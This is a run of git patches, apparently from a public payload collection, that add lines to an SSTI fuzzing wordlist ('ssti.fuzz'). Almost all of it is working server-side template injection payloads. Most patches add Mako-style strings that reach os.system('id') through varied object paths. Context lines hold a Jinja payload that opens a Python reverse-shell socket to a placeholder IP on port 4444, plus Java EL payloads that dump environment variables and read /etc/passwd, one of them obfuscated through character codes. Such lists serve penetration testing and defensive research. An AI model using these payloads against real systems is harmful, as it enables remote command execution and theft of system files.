From 90eb285fe7c064a72680a0072649d067211930a4 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 01/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index ced385b..469eb62 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -46,4 +46,4 @@ ${"freemarker.template.utility.Execute"?new()("id")} {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} ${T(java.lang.System).getenv()} ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} -${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} \ No newline at end of file +${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")} From 106ea6b2e7f7a0f983a98b30cf119774bf0b6292 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 02/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 469eb62..1918b46 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -47,3 +47,4 @@ ${"freemarker.template.utility.Execute"?new()("id")} ${T(java.lang.System).getenv()} ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")} +${self.module.runtime.util.os.system("id")} From e35d1b0ffd9f594bcfb66e4fa8707d2177c01e4d Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 03/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 1918b46..d4f772c 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -48,3 +48,4 @@ ${T(java.lang.System).getenv()} ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")} ${self.module.runtime.util.os.system("id")} +${self.template.module.cache.util.os.system("id")} From deed44397af264cf18732c9e0c7baa0ea59b6d42 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 04/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index d4f772c..45036c9 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -49,3 +49,4 @@ ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")} ${self.module.runtime.util.os.system("id")} ${self.template.module.cache.util.os.system("id")} +${self.module.cache.compat.inspect.os.system("id")} From 039dae7c327f76257c784c47deabb1e71782ae92 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 05/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 45036c9..c84d34d 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -50,3 +50,4 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex ${self.module.runtime.util.os.system("id")} ${self.template.module.cache.util.os.system("id")} ${self.module.cache.compat.inspect.os.system("id")} +${self.__init__.__globals__['util'].os.system('id')} From dd875ffa3283922e4bdc82f8ee6fae3b2e92192b Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 06/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index c84d34d..f348f43 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -51,3 +51,4 @@ ${self.module.runtime.util.os.system("id")} ${self.template.module.cache.util.os.system("id")} ${self.module.cache.compat.inspect.os.system("id")} ${self.__init__.__globals__['util'].os.system('id')} +${self.template.module.runtime.util.os.system("id")} From b84e4c3a7d5eabb1ec1c41376f1b2bd458026b96 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 07/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index f348f43..bca22d1 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -52,3 +52,4 @@ ${self.template.module.cache.util.os.system("id")} ${self.module.cache.compat.inspect.os.system("id")} ${self.__init__.__globals__['util'].os.system('id')} ${self.template.module.runtime.util.os.system("id")} +${self.module.filters.compat.inspect.os.system("id")} From 21318a12cdd6819aa464ecfdfc2379cd70e8c924 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 08/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index bca22d1..f6b655d 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -53,3 +53,4 @@ ${self.module.cache.compat.inspect.os.system("id")} ${self.__init__.__globals__['util'].os.system('id')} ${self.template.module.runtime.util.os.system("id")} ${self.module.filters.compat.inspect.os.system("id")} +${self.module.runtime.compat.inspect.os.system("id")} From bdab385cfb41ef0560d09f8c2cde4ba86b927afe Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 09/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index f6b655d..fcf2aa6 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -54,3 +54,4 @@ ${self.__init__.__globals__['util'].os.system('id')} ${self.template.module.runtime.util.os.system("id")} ${self.module.filters.compat.inspect.os.system("id")} ${self.module.runtime.compat.inspect.os.system("id")} +${self.module.runtime.exceptions.util.os.system("id")} From b0f90090c1e4e3e0fd0f6260a504663892397b44 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 10/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index fcf2aa6..752328b 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -55,3 +55,4 @@ ${self.template.module.runtime.util.os.system("id")} ${self.module.filters.compat.inspect.os.system("id")} ${self.module.runtime.compat.inspect.os.system("id")} ${self.module.runtime.exceptions.util.os.system("id")} +${self.template.__init__.__globals__['os'].system('id')} From cad01e9f31a6d8dcaa62234e9a0ab2c4b00e1051 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 11/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 752328b..94311de 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -56,3 +56,4 @@ ${self.module.filters.compat.inspect.os.system("id")} ${self.module.runtime.compat.inspect.os.system("id")} ${self.module.runtime.exceptions.util.os.system("id")} ${self.template.__init__.__globals__['os'].system('id')} +${self.module.cache.util.compat.inspect.os.system("id")} From 5b93737723a43865536197d52088b522a3ac7817 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 12/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 94311de..0089392 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -57,3 +57,4 @@ ${self.module.runtime.compat.inspect.os.system("id")} ${self.module.runtime.exceptions.util.os.system("id")} ${self.template.__init__.__globals__['os'].system('id')} ${self.module.cache.util.compat.inspect.os.system("id")} +${self.module.runtime.util.compat.inspect.os.system("id")} From 438b9f7564e98e147ddf109d93523bae67511c7e Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 13/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 0089392..dbec6f6 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -58,3 +58,4 @@ ${self.module.runtime.exceptions.util.os.system("id")} ${self.template.__init__.__globals__['os'].system('id')} ${self.module.cache.util.compat.inspect.os.system("id")} ${self.module.runtime.util.compat.inspect.os.system("id")} +${self.template._mmarker.module.cache.util.os.system("id")} From f7c32338e78ee4a90e3c1b53a977240b49425f8b Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 14/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index dbec6f6..40b1456 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -59,3 +59,4 @@ ${self.template.__init__.__globals__['os'].system('id')} ${self.module.cache.util.compat.inspect.os.system("id")} ${self.module.runtime.util.compat.inspect.os.system("id")} ${self.template._mmarker.module.cache.util.os.system("id")} +${self.template.module.cache.compat.inspect.os.system("id")} From 7582f0c527fcd5da9b82dceccdff7198274987ed Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 15/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 40b1456..4763e2a 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -60,3 +60,4 @@ ${self.module.cache.util.compat.inspect.os.system("id")} ${self.module.runtime.util.compat.inspect.os.system("id")} ${self.template._mmarker.module.cache.util.os.system("id")} ${self.template.module.cache.compat.inspect.os.system("id")} +${self.module.cache.compat.inspect.linecache.os.system("id")} From 4b27af5a3d2d856210eac42bdced10dcf8d4efc4 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 16/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 4763e2a..f28f122 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -61,3 +61,4 @@ ${self.module.runtime.util.compat.inspect.os.system("id")} ${self.template._mmarker.module.cache.util.os.system("id")} ${self.template.module.cache.compat.inspect.os.system("id")} ${self.module.cache.compat.inspect.linecache.os.system("id")} +${self.template._mmarker.module.runtime.util.os.system("id")} From 018680b5d976d02444c878b3ad6cd13c24a3b849 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 17/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index f28f122..485ab7a 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -62,3 +62,4 @@ ${self.template._mmarker.module.cache.util.os.system("id")} ${self.template.module.cache.compat.inspect.os.system("id")} ${self.module.cache.compat.inspect.linecache.os.system("id")} ${self.template._mmarker.module.runtime.util.os.system("id")} +${self.attr._NSAttr__parent.module.cache.util.os.system("id")} From 7b68dba601b9c30a8130f83779aa95936759045d Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 18/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 485ab7a..d51b877 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -63,3 +63,4 @@ ${self.template.module.cache.compat.inspect.os.system("id")} ${self.module.cache.compat.inspect.linecache.os.system("id")} ${self.template._mmarker.module.runtime.util.os.system("id")} ${self.attr._NSAttr__parent.module.cache.util.os.system("id")} +${self.template.module.filters.compat.inspect.os.system("id")} From 53e43767683f8adecf45feb94334d53ff26b57ef Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 19/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index d51b877..ee400e0 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -64,3 +64,4 @@ ${self.module.cache.compat.inspect.linecache.os.system("id")} ${self.template._mmarker.module.runtime.util.os.system("id")} ${self.attr._NSAttr__parent.module.cache.util.os.system("id")} ${self.template.module.filters.compat.inspect.os.system("id")} +${self.template.module.runtime.compat.inspect.os.system("id")} From 8c7f18a1e037b88d20456f6dfb1f8ecb2a27db9e Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 20/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index ee400e0..853d065 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -65,3 +65,4 @@ ${self.template._mmarker.module.runtime.util.os.system("id")} ${self.attr._NSAttr__parent.module.cache.util.os.system("id")} ${self.template.module.filters.compat.inspect.os.system("id")} ${self.template.module.runtime.compat.inspect.os.system("id")} +${self.module.filters.compat.inspect.linecache.os.system("id")} From 7f8f8216dbe7ddce8923600a99d8aec4ddaf0752 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 21/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 853d065..abb0128 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -66,3 +66,4 @@ ${self.attr._NSAttr__parent.module.cache.util.os.system("id")} ${self.template.module.filters.compat.inspect.os.system("id")} ${self.template.module.runtime.compat.inspect.os.system("id")} ${self.module.filters.compat.inspect.linecache.os.system("id")} +${self.module.runtime.compat.inspect.linecache.os.system("id")} From 3dec0dd66a3d2194aa145a1d001c19afb526492e Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 22/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index abb0128..02ceb49 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -67,3 +67,4 @@ ${self.template.module.filters.compat.inspect.os.system("id")} ${self.template.module.runtime.compat.inspect.os.system("id")} ${self.module.filters.compat.inspect.linecache.os.system("id")} ${self.module.runtime.compat.inspect.linecache.os.system("id")} +${self.template.module.runtime.exceptions.util.os.system("id")} From 70eb4d9315dbfb88bbd852fe837c9a3eaccf036f Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 23/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 02ceb49..4933dfe 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -68,3 +68,4 @@ ${self.template.module.runtime.compat.inspect.os.system("id")} ${self.module.filters.compat.inspect.linecache.os.system("id")} ${self.module.runtime.compat.inspect.linecache.os.system("id")} ${self.template.module.runtime.exceptions.util.os.system("id")} +${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} From 782045a4010e39e6092458bb955c46b40834dab4 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 24/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 4933dfe..ea54661 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -69,3 +69,4 @@ ${self.module.filters.compat.inspect.linecache.os.system("id")} ${self.module.runtime.compat.inspect.linecache.os.system("id")} ${self.template.module.runtime.exceptions.util.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} +${self.context._with_template.module.cache.util.os.system("id")} From af2e5712c91b4fb2db30ced2eb9ac358edd7218c Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 25/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index ea54661..7bec144 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -70,3 +70,4 @@ ${self.module.runtime.compat.inspect.linecache.os.system("id")} ${self.template.module.runtime.exceptions.util.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} ${self.context._with_template.module.cache.util.os.system("id")} +${self.module.runtime.exceptions.compat.inspect.os.system("id")} From f918af50f7b0d7c07472795c920a3cd7cca514a7 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 26/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 7bec144..a423698 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -71,3 +71,4 @@ ${self.template.module.runtime.exceptions.util.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} ${self.context._with_template.module.cache.util.os.system("id")} ${self.module.runtime.exceptions.compat.inspect.os.system("id")} +${self.template.module.cache.util.compat.inspect.os.system("id")} From 0357ba015214bb0ecc928e23f52211f13a99efd2 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 27/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index a423698..54f33a5 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -72,3 +72,4 @@ ${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} ${self.context._with_template.module.cache.util.os.system("id")} ${self.module.runtime.exceptions.compat.inspect.os.system("id")} ${self.template.module.cache.util.compat.inspect.os.system("id")} +${self.context._with_template.module.runtime.util.os.system("id")} From dcf8c6dd06584346844e036422f31cdf512f83d0 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 28/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 54f33a5..c62cc37 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -73,3 +73,4 @@ ${self.context._with_template.module.cache.util.os.system("id")} ${self.module.runtime.exceptions.compat.inspect.os.system("id")} ${self.template.module.cache.util.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.util.os.system("id")} +${self.module.cache.util.compat.inspect.linecache.os.system("id")} From 2e1ca7710dc27dd05ef8f3403c160b63fede7283 Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 29/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index c62cc37..ef2a1bb 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -74,3 +74,4 @@ ${self.module.runtime.exceptions.compat.inspect.os.system("id")} ${self.template.module.cache.util.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.util.os.system("id")} ${self.module.cache.util.compat.inspect.linecache.os.system("id")} +${self.template.module.runtime.util.compat.inspect.os.system("id")} From b3894642123032e667a1c34ba0e293a61c5244aa Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 30/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index ef2a1bb..dda2a87 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -75,3 +75,4 @@ ${self.template.module.cache.util.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.util.os.system("id")} ${self.module.cache.util.compat.inspect.linecache.os.system("id")} ${self.template.module.runtime.util.compat.inspect.os.system("id")} +${self.module.runtime.util.compat.inspect.linecache.os.system("id")} From d43c041983a0a67b2dce17d827eb33db693224cd Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 31/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index dda2a87..51f09e0 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -76,3 +76,4 @@ ${self.context._with_template.module.runtime.util.os.system("id")} ${self.module.cache.util.compat.inspect.linecache.os.system("id")} ${self.template.module.runtime.util.compat.inspect.os.system("id")} ${self.module.runtime.util.compat.inspect.linecache.os.system("id")} +${self.module.runtime.exceptions.traceback.linecache.os.system("id")} From 81ef493e9892e61b01d6a3281ebd963a9d731e8c Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH 32/60] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git 